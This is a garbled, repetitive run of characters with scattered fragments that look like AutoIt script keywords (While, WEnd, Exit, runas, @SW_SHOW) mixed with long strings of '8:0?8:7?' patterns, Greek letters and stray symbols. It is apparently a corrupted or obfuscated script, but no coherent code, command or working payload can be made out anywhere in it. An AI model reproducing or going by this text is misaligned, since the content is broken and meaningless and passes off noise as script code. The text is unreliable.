eXit$πe
eXit$Xκκκκκκκ(κκκκκκκκκκκκκκκκκκκκκκκκκκκκ]κκκκκκκκκκκκ0:0κκκκκκκκ]κκκκκκκκκκκκ8:0?8:7?8:1?8:0?W+8:''End$4
$Enn$b+''WEniκκοκκκ]κκκκκκκκκκκκκκμκκκκκwH$1$2$R$b+''WEnd
$
While„$n2winflashe$4$2
While$nκκκ1?8:0?8:0?8:1?8:1?8:3?8:7?8:7?8:0?8:1?8:7?7:0?8:0?8:runas1?8:1?8:7?8:1?1:88?:7?8:κκκκκκκκκκκκκκκ''WEnd$4
$nfl0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?κκκκκκκκ''WEnd$4
$nf,0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?8:3?8:1?8:3?8:1?8A:1?8:7?8:0?8:$R$b+''d
$ 
While„$:0?8Enile b+':1?8:0?8:0?8:1¨8:1?8:3?8:7?8:7?8:7?8':1?8:0?8:1?8:0?8:0?8:1?8:1?8:3?8:1?8:8:1?8:0?8:7?x:7?step8:0?8:10
?8:0?8:1?8:1?8:7?WEnd8:1?1:8?8:7?8:$4
$Enn$b+''W0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?8:3?8:1?iiiiii@@@@Xit$Xκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκ]κκκκκκκκκκκκ0:0κκκκκκκκ]κκκκκκκκκκκκ8:0?8:7?8:1?8:0?W+8:''End$4
$8:3?8:1?8:3?8:1?8A:1?8:7?8:0?8:$R$b+''d
$ 
While„$n2
Wilisobj:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?8:?8:0?W+8:''End$4
$8:3?8:1?8:3?8:1?8A:1?8:7?8:0?8:$R$b+''d
$ 
Whale„$n2
Wilisobje n$1$2$R$b+''WEnd:1?8:0?$3=+nUll
+$3
+$8:1?8:0ii:3?8:1?8:1?8:7‡8:0?8:7?8:1?8:0?8Enile b+':1?8:0?8:0?8:1?8:1?8:3?8:7?8:7?8:7?8':1?8:0?8:1?8:0?8:0?8:1?8:1?8:3?8:1?8:3?8:1?8:1?8:7?8:8:1?8:1?8:7?8:1?1:8Ζ?8:7??8:7?WEnd8:1?1:8?8:7?8:$4
$Enn$b+''W0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?8:?8:0?W+8:''End$4
$8:3?8:1?8:3?6:1?8A:1?8:7?8:0?8:$R$b+''d
$ 
While„$n2
Wilisobje n$1$2$R$b+''WEnd:1?8:0?8:1?8:0?8:7?x:7?7:0?8:0?8:1?8:1?8:7?8:1?1:8C8:7?8:$4
$Enn$b+''Whex:0?8:1?8:1?8:3?8:1?iiiiii@@@@Xit$Xκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκ]κκκκκκκκκκκκ0:0κκκκκκκκ]κκκκκκκκκκκκ8:0?8:7?8:1?8:0?W+8:''End$4
$8:3?8:1?8:3?8:1?8A:1?8:7?8:0?8:$R$b+''d
$ 
While„$n2
Wilisobj:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?8:?8:0?W+8:''End$4
$8:3?8:1?8:3?8:1?8A:1?8:7?8:0?8:$R$b+''d
$ 
Whale„$n2
Wilisobje n$1$2$R$b+''WEnd:1?8:0?$3=+nUll
+$3
+$8:1?8:0ii8:3?8:1?8:1?8:7‡8:0?8:7?8:1?8:0?8Enile b+':1?8:0?8:0?8:1?8:1?8:3?8:7?8:7?8:7?8':1?8:0?8:1?8:0?8:0?8:1?8:1?8:3?8:1?8:3?8:1?8:1?8:7?8:8:1?8:1?8:7?8:1?1:8Ζ?8:7??8:7?WEnd8:1?1:8?8:7?8:$4
$Enn$b+''W0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?8:?8:0?W+8:''End$4
$8:3?8:1?8:3?6:1?8A:1?8:7?8:0?8:$R$b+''d
$ 
While„$n2
Wilisobje n$1$2$R$b+''WEnd:1?8:0?8:1?8:0?8:7?x:7?7:0?8:0?8:1?8:1?8:7?8:1?1:8C8:7?8:$4
$Enn$b+''Whex:7?8:8:1?8:3?8:1?8:3?8:1?8:1?$Enn$b+''W0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?8:?8:0?W+8:''End$4
$8:3?8:1?8:3?6:1?8A:1?8:7?8:0?8:$R1$2$R$b+''WEnd:1?8:0?$3=+nUll
+$3
+$8:1?8:0ii8:3?8:1?8:1?8:7‡8:0?8:7?8:1?8:0?8Enile b+':1?8:0?8:0?8:1?8:1?8:3?8:7?8:7?8:7?8':1?8:0?8:1?8:0?8:0?8:1?8:1?8:3?8:1?8:3?8:1?8:1?8:7?8:8:1?8:1?8:7?8:1?1:8Ζ?8:7??8:7?WEnd8:1?1:8?8:7?8:$4
$Enn$b+''W0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?8:?8:0?W+8:''End$4
$8:3?8:1?8:3?6:1?8A:1?8:7?8:0?8:$R$b+''d
$ 
While„$n2
Wilisobje n$1$2$R$b+''WEnd:1?8:0?8:1?8:0?8:7?x:7?7:0?8:0?8:1?8:1?8:7?8:1?1:8C8:7?8:$4
$Enn$b+''Whex:7?8:8:1?8:3?8:1?8:3?8:1?8:1?$Enn$b+''W0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?8:?8:0?W+8:''End$4
$8:3?8:1?8:3?6:1?8A:1?8:7?8:0?8:$R$b+'@SW_SHOW'd
3$ 
While„$n2
Wilisobje n$1$2$R$b+''WEnd:1?8:0?8:1?8:08:7?x:7?7:0?8:0?8:1?8:1?8:7?8:1?1:8?8:7?8:$4
$Enn$b+''Whex:7??8:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?8:?8:0?W+8:''End$4
$8:3?8:1?8:3?6:1?8A:1?8:7?8:0?8:$R$b+'@SW_SHOW'd
$ 
While„$n2
Wilisobje n$1$2$R$b+''WEnd:1?8:0?8:1?8:0?8:7?x:7?7:0?8:0?8:1?8:1?8:7??18:1:8?8:7?8:$4
$